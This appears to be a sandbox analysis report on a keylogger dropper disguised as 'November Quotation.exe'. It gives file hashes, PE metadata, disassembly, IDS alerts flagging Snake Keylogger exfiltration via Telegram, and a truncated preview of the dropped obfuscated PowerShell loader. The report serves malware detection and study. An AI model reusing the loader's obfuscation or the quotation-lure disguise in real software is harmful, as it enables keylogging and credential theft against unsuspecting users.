                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Users\user\Desktop\November Quotation.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):309198
                                                                                                            Entropy (8bit):7.687688364471506
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:+45Jz+d75cwaWrXVEFGv23rV8jwg2LGucOx7B0/ghRvp9EyMX4BWA:nBS7l/XVEFGv23Kwg2LGUJRB9EyMX4b
                                                                                                            MD5:E5466E123FF5ED549CDCD775BCA484F2
                                                                                                            SHA1:46ACAB555B1CF24512E5D5F7C2BACEA6182A5624
                                                                                                            SHA-256:61AA8D19A5C0C98767C0561275EA0A7336DE8255413B4098DB600BCFE6321ABF
                                                                                                            SHA-512:F8861A0F3D643130172474B55A05ED442144C897934EB330203910BA408D2714AB86D05044CCB402B3504461F5743676DEC0A7DB4CFF1E6455805615A5C35D64
                                                                                                            Malicious:false
                                                                                                            Preview:......DD.........yy..SS..............<<<<..............a...................................<........hh.......a.........{.b............W...K......(.......?..................r.N......DDDD...L............,...z.CCC...............X...........==..b.4..g............................sss......_..A..............................L..........w..........cc.....7......P..LLLL.......U..................7..2... ..cc...........................WWWWW............&....................h.......r...9...........;.............````.P.............................nn...]............V...........A....................................=..__..............q.~~.........E.............;.....QQQ.y...................... .........u.............[...............,,.........................k........k.K...............=.....00.....yyyyy.====.....1..8..........[[.........4................Q..Z............C.\\.mmm.....................................PP...---.........++...............................r.........g.PP..888.c.G.............t.....
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                            Category:dropped
                                                                                                            Size (bytes):778344
                                                                                                            Entropy (8bit):7.97640116034132
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:rI9y5EG2ab+ek+FWcHng0zChAFzDr1/RvK4f6efLIyc/QAIMOms+xwptpXhX51H/:JVxfHWeg0zPzN/R/6MIVHIRZtphp1H/
                                                                                                            MD5:EBFE0469CA7E7A5CA4957B72BF4B1A48
                                                                                                            SHA1:A5ABD780240905F85846A2EB91B17FFBFED640AB
                                                                                                            SHA-256:5D68FC50B0A3CEF7ACCABD9C3195998C04A0ADAE0A7E8B3FAC3881F5C5397305
                                                                                                            SHA-512:F8215A057BCAC613C817D5837A3CCD249CDDAF8F8E355921D8F56A2D83CBDF0D0F22874F00DD0E5D640122CFBE8B3F7B79BCA440196DB54F0C861013C782D350
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 61%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................b..........)2............@..................................................................................P... ..........h................................................................................................text...l`.......b.................. ..`.rdata..`............f..............@..@.data................|..............@....ndata.......P...........................rsrc.... ...P..."..................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:true
                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                            Process:C:\Users\user\Desktop\November Quotation.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):419440
                                                                                                            Entropy (8bit):1.2480722763583403
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:4BwK0Pb9vPh5wDlFliMx5mJhqxVcOyVQvXFLYV:6Iz9H4D4Mx5Wh4HzGV
                                                                                                            MD5:F53585FFDD1E9FD890FDA7C8760B4765
                                                                                                            SHA1:C835F9A0A67B77A2D671A7A04BEA8CE810307850
                                                                                                            SHA-256:D95B9B8EBE45ED0AACD94595297C6155D6EAE9CA57EA4B5E586513A3628AFDB1
                                                                                                            SHA-512:38ABCA14F2B6874C66235EF08EDA10327D2A58769D122AA164A4A1A86FE3D966D0F7AEA554E6315157DC80A72E4156F6A4CD1452DC5F3D2CED3F7D407772ECFF
                                                                                                            Malicious:false
                                                                                                            Preview:.........................E.....................................R..........G.......0.............Y..............................................*....@.................:......................................................u..............................U..................l.......................................................................1...................M.......P......J.......................................|............R.......................................::..<%............................O.....}.................................N..........................................B............................N......................................;.......D....................................................................................a.................................................../..K....................................................................................w.......................................................................;......................................
                                                                                                            Process:C:\Users\user\Desktop\November Quotation.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):330846
                                                                                                            Entropy (8bit):1.260352790698924
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:tJCG3Zp6ICBp3uKWDL9e7LZSQvwthb++dk5MJKUe4ZCGKtnyuwvKZGye8HBdEmTN:tJ3u2two+KyomXrv4BxnU7cjkE+8
                                                                                                            MD5:F3705D740DCA8D46B5A48D60C835E2A1
                                                                                                            SHA1:9E80CF8669C2A6680BE5AEEE5E84B7BFB55E04E3
                                                                                                            SHA-256:87B08EA9D89BC023BE4A6CEF3CA5B74DAC237A35173651C31E8B19062C427064
                                                                                                            SHA-512:6C5B39CCBA3D187DBC2CD14620CBDE9BDC778CC59CF96C5F8900B3CC40099A0C66E7ECB5CD30203A7D71BF183F9B2E49BB582A632AE12CF94A62232548D4687C
                                                                                                            Malicious:false
                                                                                                            Preview:...7F......................./...............................u....P.................=................................."...............................................................................................B......................................................|...............P........;..............%..v......................I................................................Z]...4..........................................................a......................................................................W.........................................x.t...................................................................................................`................................%.................z.a.......................%...........................`...............P...%..........q......H.].......................0............................................].....................................]..........e........*......s...x.v........................................Z...........
                                                                                                            Process:C:\Users\user\Desktop\November Quotation.exe
                                                                                                            File Type:ASCII text, with very long lines (420), with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):498
                                                                                                            Entropy (8bit):4.3054308720223355
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:qzp84ke8uH/7LIAwsL009wHT9vlrbUoiNbixsjGC7H/H/rTA:qAhuH/Pr0qwxvBUnqbGHA
                                                                                                            MD5:DEE6FD93E40102A2D88FBD1EB620D5AE
                                                                                                            SHA1:0FBBCCA4BC3A63D6483705F71A1248B9E9C0E731
                                                                                                            SHA-256:653C71C641347ED4C3A1F887914AE2DC458D188DAAA9BA78BD6847C10F7991F9
                                                                                                            SHA-512:E1DC9F48BF9DF764A8C1EEFC5F207055EC1D607C186C54FE17DDCB6F123627D688499C104B0B470B437B5A0F711474EBB30FF10BD275C2B5209958D2496B3668
                                                                                                            Malicious:false
                                                                                                            Preview:studious ambulacra burdon fjernseer overrkkelsen ludderkarle livingly.scientificogeographical hypotaktiskes ecclesioclastic biestings stormoguler,arvebeholdningens nedskrivningstidspunkt delebrnenes opmarchfelts bemingles,nasalized unquittable efterrationalisere trafikministerium hemeralopic buckeens,feasibilities northing diiodide drukken cauponate attenaarsfdselsdages acknowledger stomal chalcocite moors brstningen..liberalist miraculosity broby semipneumatical griffin unlethargic chittered,
                                                                                                            Process:C:\Users\user\Desktop\November Quotation.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):400041
                                                                                                            Entropy (8bit):1.2584780109276614
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:PZ3YIEY5YqtG8iK71hNbof463B02ddipw:h3dt5jG8iK7Rbonx0A
                                                                                                            MD5:08153E7C8C786458C9204FA5AB05DA6F
                                                                                                            SHA1:2D0DE2FFB4D2B4B32239B238A7F2F4DEAE6242B5
                                                                                                            SHA-256:E1B321A718070E6BC55A2D09BA6458C315C3E2012D6CFC38FA706EAC714787B6
                                                                                                            SHA-512:E37D596C5794820F25856AFBD00978E3BB85A726B84ED5BBD39514D73A2AEBCCC79E4F5F59E1F2B4DD42CCA97696762BFA88A9C1AC0427F6FF6268F977273A02
                                                                                                            Malicious:false
                                                                                                            Preview:.............................R..................c............................................................................................o..........................................u...............E.....:.P...........8.................................Z.........................................;......y......................=..........................0....M........................$...................................................v...............;................i........9........................................Y..................................pK........ ....b......................................................................................................................................................................Y..................5.................{............1..............................................o......................................O..............4..................................................................W.........+......3........h....................
                                                                                                            Process:C:\Users\user\Desktop\November Quotation.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):380141
                                                                                                            Entropy (8bit):1.2574687741536028
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:3vD0NBovaItxEQPmk6v4We0jR/yP8d9bOBhVceyrR9e2hHcrFiPSPDITvoS9EoCV:V2cUcRZ6NVCSnzxY9I54r2wlhTtcgD
                                                                                                            MD5:678AE408AFCD33E6AB7E3407E8299900
                                                                                                            SHA1:4948239D5601EE3834D74E408BB216A2D7CDC5B3
                                                                                                            SHA-256:6DED8514E23407D3E6ABA312ECF511B304C20056DBF61B4411DD9289E3E38EC7
                                                                                                            SHA-512:3ED610200A030C2D260CC9CE1FD5AD314FAE7872B7B5128ECF9868EE95E06B8641DB8D8B296B0D64EF72AC872CB8AB673A5EC33786561B7562B4D2DDE9565778
                                                                                                            Malicious:false
                                                                                                            Preview:.............................................................................o...................................N...Y..7....................<..................................................n........................A.....................~.................................................................................j....#..............................................................^4..................Ry.............W............................................. .|.............................q....(...............0X......<.................................................o..............=..........................................................(.......................................................................2...............................1........0................................r........V.....................5.............................................................T...............y........).........................\.............|...............................e.......
                                                                                                            Process:C:\Users\user\Desktop\November Quotation.exe
                                                                                                            File Type:ASCII text, with very long lines (4175), with CRLF, LF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):69718
                                                                                                            Entropy (8bit):5.2028812445345585
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:dCor2KyN7vv0sM4+dldM9VheYtL967zlTOlQ:dCoV4vxGlSVhVARClQ
                                                                                                            MD5:F1B47D3B2608577828342F5E8A7C9BF8
                                                                                                            SHA1:11AED67EF8C02835FBCDC4B90D4A3A23113EAF4C
                                                                                                            SHA-256:54D3AB1EA222AB9A21976E86DFDD0340023E12D5CCE6107257BE8EEC589FED88
                                                                                                            SHA-512:A3A58689EE9132DAB950524FF8F77BB96D9A9095EE4DA811BA8FD57E7D865F8D255F39F2486BCD6F61EDA96F882342DEF08171DD0DDAF2013C871FC9E809C59D
                                                                                                            Malicious:true
                                                                                                            Preview:$Superperson=$Guldmntfod;..<#roamingly Washbasin Radiciform #>..<#Bukseknappen Selvherskers Unsubjected Omstningsforhold Protelytropteron #>..<#Anfordre Terrorise Rundkredses #>..<#Nonsupportability Hierographer Superorder Eksamensresultaternes Kultivwyr Tusindstraales #>..<#plateauers hypothecary Vanvittiges Aporobranchian Konferencerum #>..<#Preconsume Filamenterne Analgen udbudene Skovduer Orkestrenes Acrita #>...$Unimpeded = @'.Synagog.Tekstbl$Daar,igCdilan ieStikordn AkademtHoneyb,a FeminovFrst inoBygdsjesSv ngenpSvimlentBombeofeEnvironrComatosyFortinngLatic foSwansont AllongeKlar gb=Apogamo$Triang.HTrykbaro LovsanlEva geld.rededue NonthrnFla elldIndoneseAsparag;Rdstens. dimlyrfSi.oejnuPerversn UninticReadorntBj,rgfyiUn postoForundenSparrer LeptoloNDomsprauFremsprc LaichphIso,enoaRad umil UforskeAfkoder Compu e(Patr.ce$PolyhisCFaldrateTareredn jemmetPeberbsa Sammenv Kemikao Delstes Tetrab,Equicur$Ophrea.KSkalpejaSnalrets OutgaitUreth oe Ekstrap Parer i gaffellstjer ee ofemisTill
                                                                                                            Process:C:\Users\user\Desktop\November Quotation.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):491235
                                                                                                            Entropy (8bit):1.2538765845677147
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:FawI4v7S6p/E5EU9JY0/pp/ML+TnDlimevo973PeAfw:FVY6+5jW0/ppk4kQ1WGw
                                                                                                            MD5:62863D598F1A549DD404F0E847CB0E80
                                                                                                            SHA1:693CC97D03FC863A591453B9E56BB5ACCC8EE514
                                                                                                            SHA-256:30064BCF87470C975F5644266359199C88F648815297CA8784EDC68610C06794
                                                                                                            SHA-512:5C804A3D1CEC1E0669F3A0B02B09E3E4430659C217B4F15ECC6757818EF67DFD17655C8E7C49A5B56B01F13FB0BCD9D01670CF6E984E9491BF8B9698B5109CA9
                                                                                                            Malicious:false
                                                                                                            Preview:.................................................................................b......b...............4........j...............................s....I........i....2................b.H..............................e....................................j...j...........k......................................d............................................S..............j........................................................c...............................................................................L....W...........<.......U.......................#...........A...................q.............................=.....................E..........................................................................................}...........................................4...................)..8..................................6........A...............................................................................5>..........m.....................................................................
                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                            Entropy (8bit):7.97640116034132
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:November Quotation.exe
                                                                                                            File size:778'344 bytes
                                                                                                            MD5:ebfe0469ca7e7a5ca4957b72bf4b1a48
                                                                                                            SHA1:a5abd780240905f85846a2eb91b17ffbfed640ab
                                                                                                            SHA256:5d68fc50b0a3cef7accabd9c3195998c04a0adae0a7e8b3fac3881f5c5397305
                                                                                                            SHA512:f8215a057bcac613c817d5837a3ccd249cddaf8f8e355921d8f56a2d83cbdf0d0f22874f00dd0e5d640122cfbe8b3f7b79bca440196db54f0c861013c782d350
                                                                                                            SSDEEP:12288:rI9y5EG2ab+ek+FWcHng0zChAFzDr1/RvK4f6efLIyc/QAIMOms+xwptpXhX51H/:JVxfHWeg0zPzN/R/6MIVHIRZtphp1H/
                                                                                                            TLSH:12F4234979E0F935DE670F35F03254B58BD6E8587013AA07D7108E2A7A3E582E81F72B
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................b..........)2............@
                                                                                                            Icon Hash:1f9706b9f9391b86
                                                                                                            Entrypoint:0x403229
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:true
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x52BA66B8 [Wed Dec 25 05:01:44 2013 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:7ed0d71376e55d58ab36dc7d3ffda898
                                                                                                            Signature Valid:false
                                                                                                            Signature Issuer:CN=Schairerite, O=Schairerite, L=Patay, C=FR
                                                                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                            Error Number:-2146762487
                                                                                                            Not Before, Not After
                                                                                                            • 09/10/2024 10:26:00 09/10/2027 10:26:00
                                                                                                            Subject Chain
                                                                                                            • CN=Schairerite, O=Schairerite, L=Patay, C=FR
                                                                                                            Version:3
                                                                                                            Thumbprint MD5:9C121656BA274DCAEC01A322F4D92C1A
                                                                                                            Thumbprint SHA-1:70431CF42DF7266CCF860698503A7AD67801DE49
                                                                                                            Thumbprint SHA-256:AFF12891F7C23E83D543816FAA2F72EC6F6380A169240865C2FD0EB223DB8399
                                                                                                            Serial:0D0275EA70BAB30B6D070F7111359FA500BBD8D1
                                                                                                            Instruction
                                                                                                            sub esp, 000002D4h
                                                                                                            push ebx
                                                                                                            push ebp
                                                                                                            push esi
                                                                                                            push edi
                                                                                                            push 00000020h
                                                                                                            xor ebp, ebp
                                                                                                            pop esi
                                                                                                            mov dword ptr [esp+14h], ebp
                                                                                                            mov dword ptr [esp+10h], 0040A2D8h
                                                                                                            mov dword ptr [esp+1Ch], ebp
                                                                                                            call dword ptr [00408034h]
                                                                                                            push 00008001h
                                                                                                            call dword ptr [00408134h]
                                                                                                            push ebp
                                                                                                            call dword ptr [004082ACh]
                                                                                                            push 00000008h
                                                                                                            mov dword ptr [00434F58h], eax
                                                                                                            call 00007F1770D4C0A4h
                                                                                                            mov dword ptr [00434EA4h], eax
                                                                                                            push ebp
                                                                                                            lea eax, dword ptr [esp+34h]
                                                                                                            push 000002B4h
                                                                                                            push eax
                                                                                                            push ebp
                                                                                                            push 0042B1B8h
                                                                                                            call dword ptr [0040817Ch]
                                                                                                            push 0040A2C0h
                                                                                                            push 00433EA0h
                                                                                                            call 00007F1770D4BD0Fh
                                                                                                            call dword ptr [00408138h]
                                                                                                            mov ebx, 0043F000h
                                                                                                            push eax
                                                                                                            push ebx
                                                                                                            call 00007F1770D4BCFDh
                                                                                                            push ebp
                                                                                                            call dword ptr [0040810Ch]
                                                                                                            cmp word ptr [0043F000h], 0022h
                                                                                                            mov dword ptr [00434EA0h], eax
                                                                                                            mov eax, ebx
                                                                                                            jne 00007F1770D4920Ah
                                                                                                            push 00000022h
                                                                                                            mov eax, 0043F002h
                                                                                                            pop esi
                                                                                                            push esi
                                                                                                            push eax
                                                                                                            call 00007F1770D4B74Eh
                                                                                                            push eax
                                                                                                            call dword ptr [00408240h]
                                                                                                            mov dword ptr [esp+18h], eax
                                                                                                            jmp 00007F1770D492CEh
                                                                                                            push 00000020h
                                                                                                            pop edx
                                                                                                            cmp cx, dx
                                                                                                            jne 00007F1770D49209h
                                                                                                            inc eax
                                                                                                            inc eax
                                                                                                            cmp word ptr [eax], dx
                                                                                                            je 00007F1770D491FBh
                                                                                                            add word ptr [eax], 0000h
                                                                                                            Programming Language:
                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x85a00xb4.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x650000x20b8.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xbd7680x900
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x10000x606c0x62006b261bd7f45c2df7de2d0134c84421b7False0.6672114158163265data6.457067985385169IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rdata0x80000x14600x16000aa2dc336f7337ed3785ee2afeacae36False0.4211647727272727data4.945964880166059IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .data0xa0000x2af980x600326f796323fdc724ea91090eafbe9bdcFalse0.4856770833333333data3.795352750027872IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .ndata0x350000x300000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .rsrc0x650000x20b80x220074b27a0083cbdcb566d993625801cb0eFalse0.5340073529411765data4.938841517310863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_ICON0x652080x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4608, resolution 2833 x 2833 px/mEnglishUnited States0.5978490832157969
                                                                                                            RT_DIALOG0x668300x100dataEnglishUnited States0.5234375
                                                                                                            RT_DIALOG0x669300x11cdataEnglishUnited States0.6056338028169014
                                                                                                            RT_DIALOG0x66a500xc4dataEnglishUnited States0.5918367346938775
                                                                                                            RT_DIALOG0x66b180x60dataEnglishUnited States0.7291666666666666
                                                                                                            RT_GROUP_ICON0x66b780x14dataEnglishUnited States1.05
                                                                                                            RT_VERSION0x66b900x21cdataEnglishUnited States0.5314814814814814
                                                                                                            RT_MANIFEST0x66db00x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                                                                                                            DLLImport
                                                                                                            KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, SetFileAttributesW, ExpandEnvironmentStringsW, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, SetErrorMode, GetCommandLineW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                                                                            USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                            ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                            ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                                            VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                            EnglishUnited States
                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-11-25T13:47:31.093531+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949838172.217.19.174443TCP
                                                                                                            2024-11-25T13:47:38.326543+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949859193.122.130.080TCP
                                                                                                            2024-11-25T13:47:40.889059+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949859193.122.130.080TCP
                                                                                                            2024-11-25T13:47:43.098496+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949871149.154.167.220443TCP
                                                                                                            2024-11-25T13:47:44.623459+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949877193.122.130.080TCP
                                                                                                            2024-11-25T13:47:46.772175+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949881149.154.167.220443TCP
                                                                                                            2024-11-25T13:47:50.431287+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949891149.154.167.220443TCP
                                                                                                            2024-11-25T13:47:53.739392+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949902149.154.167.220443TCP
                                                                                                            2024-11-25T13:47:57.177157+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949909149.154.167.220443TCP
                                                                                                            2024-11-25T13:48:00.630012+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949921149.154.167.220443TCP
                                                                                                            2024-11-25T13:48:04.249756+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949929149.154.167.220443TCP
                                                                                                            2024-11-25T13:48:07.632635+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949940149.154.167.220443TCP
                                                                                                            2024-11-25T13:48:10.896009+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949947149.154.167.220443TCP
                                                                                                            2024-11-25T13:48:14.213747+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949958149.154.167.220443TCP
                                                                                                            2024-11-25T13:48:17.661828+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949966149.154.167.220443TCP
                                                                                                            2024-11-25T13:48:21.001411+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949977149.154.167.220443TCP
                                                                                                            2024-11-25T13:48:24.453386+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949985149.154.167.220443TCP
                                                                                                            2024-11-25T13:48:27.885837+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949996149.154.167.220443TCP
                                                                                                            2024-11-25T13:48:31.633855+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950004149.154.167.220443TCP
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 25, 2024 13:47:28.464857101 CET49838443192.168.2.9172.217.19.174
                                                                                                            Nov 25, 2024 13:47:28.464911938 CET44349838172.217.19.174192.168.2.9
                                                                                                            Nov 25, 2024 13:47:28.465007067 CET49838443192.168.2.9172.217.19.174
                                                                                                            Nov 25, 2024 13:47:28.489459991 CET49838443192.168.2.9172.217.19.174
                                                                                                            Nov 25, 2024 13:47:28.489491940 CET44349838172.217.19.174192.168.2.9
                                                                                                            Nov 25, 2024 13:47:30.185723066 CET44349838172.217.19.174192.168.2.9
                                                                                                            Nov 25, 2024 13:47:30.185807943 CET49838443192.168.2.9172.217.19.174
                                                                                                            Nov 25, 2024 13:47:30.186403990 CET44349838172.217.19.174192.168.2.9
